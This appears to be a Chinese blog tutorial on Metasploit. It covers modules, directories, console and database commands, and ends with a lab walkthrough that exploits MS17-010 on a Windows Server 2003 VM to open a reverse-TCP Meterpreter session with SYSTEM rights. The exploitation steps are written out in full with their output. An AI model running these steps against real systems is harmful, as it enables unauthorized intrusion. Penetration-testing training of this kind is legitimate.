Metasploit框架(1), 简介, 主要模块, 目录, 基本命令, 入侵案例
Metasploit是一款开源的 安全漏洞 检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的 安全风险 情报。 这些功能包括智能开发, 代码审计 ,Web应用程序扫描, 社会工程 。
一, 主要模块
辅助模块(Aux)
渗透攻击模块(Exploits)
后渗透攻击模块(Post)
攻击载荷模块(payloads)
编码器模块(Encoders)
空指令模块(Nops)
二, 目录构成
主目录: /usr/share/metasploit-framework
config #metasploit的环境配置信息,数据库配置信息
data #后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息
db #rails编译生成msf的web框架时的数据库信息
documentation #用户说明文档及开发文档
externa1 #metasploit的一些基础扩展模块
lib #metasploit的一些基础类和第三方模块类
log #msf运行时的一些系统信息和其他信息
modules #metasploit的系统工具模块,包括辅助模块(auxiliary),渗模块(exploits),攻击荷载(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encoders)
msfbinscan #对bin文件进行文件偏移地址扫描
msfcli #metasploit命令行模式,可以快速调用有效的payload进行攻击,新版本的metasploit即将在2015年6月18日弃用
msfconsole #metasploit的基本命令行,集成了各种功能。
msfd #metasploit服务,非持久性服务
msfelfscan #对1inux的elf文件偏移地址进行扫描
msfencode #metasploit的编码模块,可以对mepayload和she11code进行编码输出
msfpayload #metasploit攻击荷载,用以调用不同的攻击荷载,生成和输出不同格式的she11ocode,新版本用msfvenmon替代。
msfmachscan #同msfelfscan
msfpescan #对windows的pe格式文件偏移地址进行扫描
msfrop #对windows的pe进行文件地址偏移操作,可以绕过alsr等
msfrpc #metasploit的服务端,非持久性的rpc服务
msfrpcd #持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xm1进行数据传输。
msfupdate #metasploit更新模块,可以用来更新metasploit模块
msfvenom #集成了msfpaylad和msfencode的功能,效率更高,即将替代msf payload和msfencode
p]ugins #metasploit的第三方插件接口
scripts #metasplit的常用后渗透模,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行
test #metasploit的基本测试目录
too1s #额外的小工具和第三方脚本工具
三, 基本命令
常用命令:
msfconsole #启动MSF console, 进入msf控制台
search #搜索模块
info #查看当前模块的详细信息
use #使用模块
show options #显示模块的参数,show mssing可以查看当前有哪些的配置没有设置
set/unset #设置变量/取消变量设置
run/exploit #运行漏洞模块
back #从模块上下文退回到msfconsole初始目录
其他命令:
msfupdate #msf版本更新,目前使用apt update进行更新
help/? #打印当下窗口的帮助文档
help command/command --help #印command命令的帮助文栏
connect #可以看成是msfconsole界面下的nc工具
edit #编辑模块的ruby文件,与用vim编辑相同
show advanced #不常用的高级选项,不会在~show options~中显示
setg/unsetg #设器全局变量/取消全局变量设置,只会设胃当前msf运行环境中的变量,退出msf后设置就复位
save #将设置保存到/root/.msf4/config,msf启动时会读取该文件,这样重新启动msf后设置依然保留
sessions #可以看见当前已经建立的攻击连接,利用~sessions -i id命令进入指定连接
jobs#查看后台运行的模块
load/unload #连接插件,如load openvas,然后会出现相应的openvas命今,使用时需要用openvas_connect连接外部扫描器
loadpath #调用自己编写的功能模块
route #向session指定路由
resource #调用rc文件的命令并执行,以方便直接取得session
searchsploit命令:
在系统shell下执行, 用于直接搜索exploits.
搜索 thinkphp 相关的模块:
searchsploit thinkphp
--------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------- ---------------------------------
ThinkPHP - Multiple PHP Injection RCEs (Metasploit) | linux/remote/48333.rb
ThinkPHP 2.0 - 'index.php' Cross-Site Scripting | php/webapps/33933.txt
ThinkPHP 5.0.23/5.1.31 - Remote Code Execution | php/webapps/45978.txt
ThinkPHP 5.X - Remote Command Execution | php/webapps/46150.txt
--------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
查询exploits文件详情:
searchsploit -p 48333
Exploit: ThinkPHP - Multiple PHP Injection RCEs (Metasploit)
URL: https://www.exploit-db.com/exploits/48333
Path: /usr/share/exploitdb/exploits/linux/remote/48333.rb
Codes: CVE-2019-9082, CVE-2018-20062
Verified: True
File Type: Ruby script, ASCII text
四, MSFDB数据库操作
MSF默认使用Kali内置的PostgreSQL数据库,也可以修改为MySQL。
1. PostgreSQL命令
systemctl status postgresql 查看数据库服务状态
sudo -u postgres psql postgres 进入PSQL数据库命令行
\l 查看数据库列表
\c msf 切换到 msf 数据库
\d 查看当前数据库的所有表
\d users 查看users表的列
\q 退出
SQL语句: 一般sql语句
2. 数据库管理命令
需要在系统shell下执行。
msfdb init 初始化数据库
msfdb reinit 重新初始化
msfdb delete 删除数据库
msfdb start 启动数据库
msfdb stop 停止数据库
msfdb status 查看数据库状态
3. msf数据库操作命令
需要在msf控制台执行。
db_connect # db_connect msf:admin@127.0.0.1:3306/msf 连接数据库, 前一个msf:用户名,admin: 密码,后一个msf:数据库名称
db_disconnect
db_status #查看数据库状态,有无连接
db_nmap #后续可以用hosts命令来查询扫描出的主机, db_nmap -O 192.168.112.200
db_rebui1d_cache#建立模块文件的缓存,使search搜索速度更快
db_remove
db_export #导出备份信息
db_import #导入备份信息,备份为xm1文件
五, 入侵案例
本案例以入侵 windows server 2003 为例.
目标主机: 192.168.112.205
1. 进入msf
msfconsole
2. nmap 搜集信息
这里是直接在msf内使用nmap, 所以命令是db_nmap, 而不是nmap.
扫描系统信息:
db_nmap -O 192.168.112.205
Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-27 23:05 EST
Nmap scan report for 192.168.112.205 (192.168.112.205)
Host is up (0.0011s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:AF:2B:D0 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows Server 2003 SP1 or SP2
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.85 seconds
扫描漏洞信息
db_nmap --script=vuln 192.168.112.205
[*] Nmap: Starting Nmap 7.93 ( https://nmap.org ) at 2023-11-27 23:06 EST
[*] Nmap: Nmap scan report for 192.168.112.205 (192.168.112.205)
[*] Nmap: Host is up (0.0030s latency).
[*] Nmap: Not shown: 996 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 1025/tcp open NFS-or-IIS
[*] Nmap: MAC Address: 00:0C:29:AF:2B:D0 (VMware)
[*] Nmap: Host script results:
[*] Nmap: |_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: | smb-vuln-ms08-067:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Microsoft Windows system vulnerable to remote code execution (MS08-067)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2008-4250
[*] Nmap: | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
[*] Nmap: | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
[*] Nmap: | code via a crafted RPC request that triggers the overflow during path canonicalization.
[*] Nmap: |
[*] Nmap: | Disclosure date: 2008-10-23
[*] Nmap: | References:
[*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
[*] Nmap: |_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
[*] Nmap: | smb-vuln-ms17-010:
[*] Nmap: | VULNERABLE:
[*] Nmap: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
[*] Nmap: | State: VULNERABLE
[*] Nmap: | IDs: CVE:CVE-2017-0143
[*] Nmap: | Risk factor: HIGH
[*] Nmap: | A critical remote code execution vulnerability exists in Microsoft SMBv1
[*] Nmap: | servers (ms17-010).
[*] Nmap: |
[*] Nmap: | Disclosure date: 2017-03-14
[*] Nmap: | References:
[*] Nmap: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
[*] Nmap: | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
[*] Nmap: |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 39.98 seconds
这里可以看到 smb-vuln-ms08-067, smb-vuln-ms17-010 漏洞可能利用.
3. 搜索漏洞模块
我们以 smb-vuln-ms17-010 为例搜索:
search ms17-010
atching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Cde Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Cmmand Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
这里一共列出了5个相关的模块.
4. 进入漏洞模块
我们以1号模块ms17_010_psexec为例, 根据编号使用它:
use 1
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) >
这里看到Shell 提示符变成了exploit(windows/smb/ms17_010_psexec) > 说明进入模块.
5. 配置模块参数
show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/word yes List of named pipes to check
lists/named_pipes.txt
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
sics/using-metasploit.html
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal r
ead/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.112.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
这里rhost参数表示目标ip, 它是必选的, 所以设置它:
set rhost 192.168.112.205
rhost => 192.168.112.205
设置完参数可以重新使用 show options 重新检查一下.
6. 执行漏洞模块
run
[*] Started reverse TCP handler on 192.168.112.201:4444
[*] 192.168.112.205:445 - Target OS: Windows Server 2003 R2 3790 Service Pack 2
[*] 192.168.112.205:445 - Filling barrel with fish... done
[*] 192.168.112.205:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.112.205:445 - [*] Preparing dynamite...
[*] 192.168.112.205:445 - Trying stick 1 (x64)...Miss
[*] 192.168.112.205:445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.112.205:445 - [+] Successfully Leaked Transaction!
[*] 192.168.112.205:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.112.205:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.112.205:445 - Reading from CONNECTION struct at: 0x87b59880
[*] 192.168.112.205:445 - Built a write-what-where primitive...
[+] 192.168.112.205:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.112.205:445 - Selecting native target
[*] 192.168.112.205:445 - Uploading payload... PqTGuwAK.exe
[*] 192.168.112.205:445 - Created \PqTGuwAK.exe...
[+] 192.168.112.205:445 - Service started successfully...
[*] 192.168.112.205:445 - Deleting \PqTGuwAK.exe...
[*] Sending stage (175686 bytes) to 192.168.112.205
[*] Meterpreter session 1 opened (192.168.112.201:4444 -> 192.168.112.205:1028) at 2023-11-27 23:26:32 -0500
meterpreter >
这里看到Shell提示符变成了 meterpreter > 说明已经入侵并连接了目标系统, 可以执行各种系统命令了.比如ps命令显示目标系统的进程:
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
172 2016 vmtoolsd.exe x86 0 ROOT-97473D4E73\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
264 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
312 264 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
336 264 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
384 336 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
396 336 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
432 596 wmiprvse.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wbem\wmiprvse.exe
576 384 vmacthlp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
596 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
660 2016 ctfmon.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\ctfmon.exe
676 384 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
736 384 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
764 384 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
780 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
976 384 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1004 384 msdtc.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\msdtc.exe
1080 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1120 384 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1208 384 VGAuthService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
1276 384 vmtoolsd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1404 384 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1436 2028 rundll32.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\rundll32.exe
1540 384 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
1660 596 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2016 1992 explorer.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\Explorer.EXE
2628 2016 cmd.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\cmd.exe
2644 2628 conime.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\conime.exe
2716 780 wuauclt.exe x86 0 ROOT-97473D4E73\Administrator C:\WINDOWS\system32\wuauclt.exe
7. 退出连接
exit
[*] Shutting down Meterpreter...
[*] 192.168.112.205 - Meterpreter session 1 closed. Reason: User exit
msf6 exploit(windows/smb/ms17_010_psexec) >
看到命令提示符回到了exploit(windows/smb/ms17_010_psexec) > .
8. 退出模块
back
msf6 >
看到命令提示符回到了msf6 > . 已经退出模块.
1661
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
